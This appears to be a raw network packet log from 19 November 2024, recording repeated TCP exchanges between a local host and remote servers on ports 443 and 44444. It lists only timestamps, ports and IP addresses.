                                                                                                                                Nov 19, 2024 18:56:15.587728977 CET44349860212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:15.587753057 CET49860443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:15.587785006 CET49860443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:15.587785006 CET49860443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:15.625737906 CET49868443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:15.625761986 CET44349868212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:15.625832081 CET49868443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:15.626693010 CET49868443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:15.626715899 CET44349868212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:16.444848061 CET44349868212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:16.445102930 CET49868443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:16.446589947 CET49868443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:16.446600914 CET44349868212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:16.446978092 CET44349868212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:16.447956085 CET49868443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:16.448084116 CET49868443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:16.448108912 CET44349868212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:16.448143005 CET44349868212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:16.448163986 CET49868443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:16.448196888 CET49868443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:16.458022118 CET4987644335192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:16.462966919 CET4433549876212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:16.463459015 CET4987644335192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:16.466115952 CET4987644335192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:16.470927000 CET4433549876212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:17.165441036 CET4433549876212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:17.165457964 CET4433549876212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:17.165473938 CET4433549876212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:17.165488958 CET4433549876212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:17.165503025 CET4987644335192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:17.165555000 CET4987644335192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:17.252074957 CET4433549876212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:17.298253059 CET4987644335192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:17.341775894 CET4987644335192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:17.346605062 CET4433549876212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:17.563766956 CET4433549876212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:17.564800024 CET4987644335192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:17.564956903 CET4987644335192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:17.566061020 CET4987644335192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:17.566247940 CET4987644335192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:17.569873095 CET4433549876212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:17.570028067 CET4433549876212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:17.571160078 CET4433549876212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:17.571614981 CET4433549876212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:17.571708918 CET4987644335192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:17.581578016 CET49884443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:17.581625938 CET44349884212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:17.582372904 CET49884443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:17.582928896 CET49884443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:17.582969904 CET44349884212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:18.393418074 CET44349884212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:18.393522978 CET49884443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:18.457139015 CET49884443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:18.457182884 CET44349884212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:18.458204985 CET44349884212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:18.459460974 CET49884443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:18.460697889 CET49884443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:18.460825920 CET44349884212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:18.460851908 CET49884443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:18.461051941 CET44349884212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:18.461097002 CET44349884212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:18.461111069 CET49884443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:18.461150885 CET49884443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:18.853514910 CET49897443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:18.853552103 CET44349897212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:18.853699923 CET49897443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:18.854428053 CET49897443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:18.854445934 CET44349897212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:19.658725977 CET44349897212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:19.658803940 CET49897443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:19.661079884 CET49897443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:19.661087990 CET44349897212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:19.661426067 CET44349897212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:19.662941933 CET49897443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:19.665076017 CET49897443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:19.665082932 CET44349897212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:19.667756081 CET49897443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:19.667915106 CET44349897212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:19.667953014 CET44349897212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:19.668032885 CET49897443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:19.668051004 CET49897443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:19.693280935 CET49905443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:19.693327904 CET44349905212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:19.693404913 CET49905443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:19.694338083 CET49905443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:19.694354057 CET44349905212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:20.539210081 CET44349905212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:20.539356947 CET49905443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:20.541574955 CET49905443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:20.541594982 CET44349905212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:20.541970015 CET44349905212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:20.543142080 CET49905443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:20.544229031 CET49905443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:20.544261932 CET44349905212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:20.544398069 CET44349905212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:20.544433117 CET44349905212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:20.544514894 CET49905443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:20.544605970 CET49905443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:20.554435968 CET49913443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:20.554474115 CET44349913212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:20.554656029 CET49913443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:20.555126905 CET49913443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:20.555146933 CET44349913212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:21.356264114 CET44349913212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:21.356359005 CET49913443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:21.464509964 CET49913443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:21.464528084 CET44349913212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:21.464883089 CET44349913212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:21.484188080 CET49913443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:21.508224010 CET49913443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:21.508305073 CET44349913212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:21.508469105 CET49913443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:21.508565903 CET44349913212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:21.508615971 CET44349913212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:21.508657932 CET49913443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:21.508685112 CET49913443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.045911074 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.045934916 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:31.046135902 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.046822071 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.046837091 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:31.879652023 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:31.879888058 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.887478113 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.887506962 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:31.887744904 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:31.888660908 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.931344986 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.250771999 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.250839949 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.250897884 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:32.310795069 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:32.315702915 CET4444450015195.19.105.66192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.315774918 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:32.316001892 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:32.316087961 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:32.316554070 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:32.316562891 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.316922903 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:32.320880890 CET4444450015195.19.105.66192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.321712971 CET4444450015195.19.105.66192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.330523968 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:32.330545902 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.330764055 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:32.331176996 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:32.331192970 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.008419037 CET4444450015195.19.105.66192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.041449070 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.041574001 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.044703960 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.044734001 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.045075893 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.046071053 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.046108961 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.046124935 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.046727896 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.046993971 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.047004938 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.064311981 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:33.211076021 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.251373053 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.423501015 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.423558950 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.423669100 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.423722982 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.434662104 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.434683084 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.710283041 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:33.715300083 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.715348959 CET44350027212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.715547085 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.715850115 CET4444450015195.19.105.66192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.715919018 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:33.716293097 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.716310978 CET44350027212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:34.457914114 CET44350027212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:34.459328890 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.460829020 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.460839033 CET44350027212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:34.461157084 CET44350027212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:34.463331938 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.463331938 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.463485956 CET44350027212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:34.463519096 CET44350027212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:34.464247942 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.464247942 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.492790937 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.492841959 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:34.493386030 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.493386030 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.493432045 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.294395924 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.294471025 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.296457052 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.296466112 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.296797037 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.297595978 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.302928925 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.303011894 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.303086996 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.303281069 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.303328991 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.303335905 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.303399086 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.345899105 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.345953941 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.346026897 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.346781969 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.346797943 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.145831108 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.145942926 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.147238970 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.147247076 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.147599936 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.148389101 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.149487019 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.149524927 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.149735928 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.149758101 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.149796963 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.149808884 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.149842024 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.170864105 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.170893908 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.171005964 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.171524048 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.171535969 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.187155962 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.187237024 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.188492060 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.188499928 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.188827038 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.189584017 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.190138102 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.190171957 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.190299034 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.190341949 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.190361977 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.190371990 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.190382957 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.190399885 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.190428972 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.250469923 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.250519037 CET44350062212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.250638008 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.251101017 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.251112938 CET44350062212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.022288084 CET44350062212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.022388935 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.024012089 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.024034977 CET44350062212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.024405003 CET44350062212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.025100946 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.030510902 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.030539036 CET44350062212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.030595064 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.030642033 CET44350062212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.262845039 CET44350121212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.263111115 CET44350121212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.263757944 CET50121443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.264012098 CET50121443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.264054060 CET44350121212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.264112949 CET50121443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.264164925 CET44350121212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.264192104 CET44350121212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.264238119 CET50121443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.264254093 CET50121443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.272670984 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.272705078 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.272764921 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.273211956 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.273221970 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.073738098 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.073843956 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.076316118 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.076323986 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.076559067 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.083719015 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.084135056 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.084153891 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.084235907 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.084254980 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.084310055 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.084331989 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.084357023 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.126015902 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.126034021 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.126159906 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.126599073 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.126610041 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.929414034 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.929500103 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.930986881 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.930995941 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.931849003 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.933034897 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.934429884 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.934457064 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.934582949 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.934607983 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.934668064 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.934755087 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.059820890 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.059890985 CET44350130212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.059967995 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.060822964 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.060841084 CET44350130212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.804972887 CET44350130212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.805052996 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.806518078 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.806526899 CET44350130212.193.169.65192.168.2.4
